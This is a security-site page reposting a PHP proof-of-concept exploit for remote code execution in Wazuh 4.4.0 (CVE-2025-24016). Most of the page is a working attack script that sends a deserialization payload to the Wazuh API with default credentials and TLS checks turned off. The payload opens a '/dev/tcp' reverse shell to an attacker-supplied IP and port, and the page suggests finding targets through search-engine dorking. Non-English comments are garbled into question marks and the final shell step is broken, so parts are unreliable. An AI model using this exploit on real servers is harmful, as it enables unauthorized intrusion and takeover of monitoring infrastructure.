Latest Tech

Latest Posts

 

 

Wazuh 4.4.0 Remote Code Execution

Details
Written by: khalil shreateh
Category: Vulnerabilities
Hits: 215
Wazuh 4.4.0 Remote Code Execution
Wazuh 4.4.0 Remote Code Execution
=============================================================================================================================================
| # Title : Wazuh v4.4.0 =============================================================================================================================================
| # Title : Wazuh v4.4.0 PHP Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://wazuh.com/ |
=============================================================================================================================================

POC :

[+] Dorking ?n Google Or Other Search Enggine.

[+] Code Description:

This PHP script is used to exploit the Remote Code Execution (RCE) vulnerability in the Wazuh server.
It sends a request to the target server with a special payload that allows a reverse shell to be opened on the local server.

[+] save code as poc.php .

[+] USage : php poc.php -u https://<worker-server>:55000/security/user/authenticate/run_as -i 192.168.1.10 -p 4444

[+] PayLoad :

<?php

// ????? ??????? ??????
ini_set('log_errors', 1);
ini_set('error_log', 'php_errors.log');
date_default_timezone_set('UTC');

// ????? ???? ??????? ???????
function color_print($text, $color = null) {
switch ($color) {
case 'error':
return "\033[1;31m$text\033[0m"; // ????? ??????
case 'warning':
return "\033[1;33m$text\033[0m"; // ????? ??????
case 'success':
return "\033[1;32m$text\033[0m"; // ????? ??????
case 'info':
return "\033[1;36m$text\033[0m"; // ????? ??????
default:
return $text;
}
}

// ?????? ?? ???????
function version_check() {
try {
$req_version = phpversion(); // ????? PHP
$pyfiglet_version = '2.5.0'; // ????????? (??????? ??????? ??? ??????)
echo "????????? ???????:\n";
echo "PHP: $req_version\n";
echo "PyFiglet: $pyfiglet_version\n";
} catch (Exception $e) {
echo "??? ?????? ?? ???????: " . $e->getMessage() . "\n";
}
}

// ?????? ?? ??? ??? IP
function check_ip($ip) {
if (filter_var($ip, FILTER_VALIDATE_IP)) {
return true;
} else {
echo color_print("IP ??? ????: $ip", 'error') . "\n";
return false;
}
}

// ?????? ?? ??? ??? Port
function check_port($port) {
if (is_numeric($port) && $port > 0 && $port <= 65535) {
return true;
} else {
echo color_print("Port ??? ????: $port", 'error') . "\n";
return false;
}
}

// ?????? ?? ??? ??? URL
function check_url($url) {
if (filter_var($url, FILTER_VALIDATE_URL)) {
return true;
} else {
echo color_print("URL ??? ????. ???? ?? ??? ???? ?? http:// ?? https://", 'error') . "\n";
return false;
}
}

// ???? ?????? ??????? ?? ??? ???????
function parse_args() {
global $argv;
$args = getopt('u:i:p:user::pass::c::n::');
return $args;
}

function main() {
$args = parse_args();

// ?????? ?? ??? ????????
if (!isset($args['u']) || !isset($args['i']) || !isset($args['p'])) {
echo color_print("??? ????? URL ? IP ? Port!", 'error') . "\n";
exit(1);
}

if (!check_ip($args['i']) || !check_port($args['p']) || !check_url($args['u'])) {
exit(1);
}

version_check();

echo "Wazuh RCE - CVE-2025-24016\n";
echo "?????? ????? ????????? ???!\n";
echo "????????? ??? ?????? ?? ?????.\n";
echo "??????: Jessie\n";
echo "????????: Aiman? Cahyo? Ihsan ? Arch \n";

// ????? ???????
$payload = [
"__unhandled_exc__" => [
"__class__" => "os.system",
"__args__" => [
"bash -i >& /dev/tcp/{$args['i']}/{$args['p']} 0>&1"
]
]
];

$headers = [
"Content-Type: application/json",
"X-Header-Name: Custom-Header"
];

// ?????? ????????
$username = $args['user'] ?? 'wazuh-wui';
$password = $args['pass'] ?? 'MyS3cr37P450r.*-';

// ????? ??? POST
$url = $args['u'];
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($payload));
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
curl_setopt($ch, CURLOPT_USERPWD, "$username:$password");
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_TIMEOUT, 10);
$response = curl_exec($ch);
$status_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

if ($status_code != 200) {
echo color_print("??? ???? ?????????: $status_code", 'error') . "\n";
if (strpos($response, 'Unauthorized') !== false) {
echo color_print("??? ????????", 'error') . "\n";
} else {
echo color_print("??????? ??? ??????: $response", 'error') . "\n";
}
exit(1);
}

echo color_print("??? ???????? ?????!", 'success') . "\n";
echo "?????????: " . color_print($response, 'info') . "\n";

// ????? ?? ????
echo color_print("?? ????? ??????? ????? ?????? ??? {$args['i']}:{$args['p']}", 'info') . "\n";
sleep(5); // ?????? ???????

$command = "bash -i";
$reverse_shell = shell_exec($command);
if ($reverse_shell === null) {
echo color_print("??? ???? ??????", 'error') . "\n";
} else {
echo color_print("?? ??????? ????? ?????? ?????!", 'success') . "\n";
}
}

main();

?>


Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

Information Security

Social Media Share
About Contact Terms of Use Privacy Policy
© Khalil Shreateh — Cybersecurity Researcher & White-Hat Hacker — Palestine 🇵🇸
All content is for educational purposes only. Unauthorized use of any information on this site is strictly prohibited.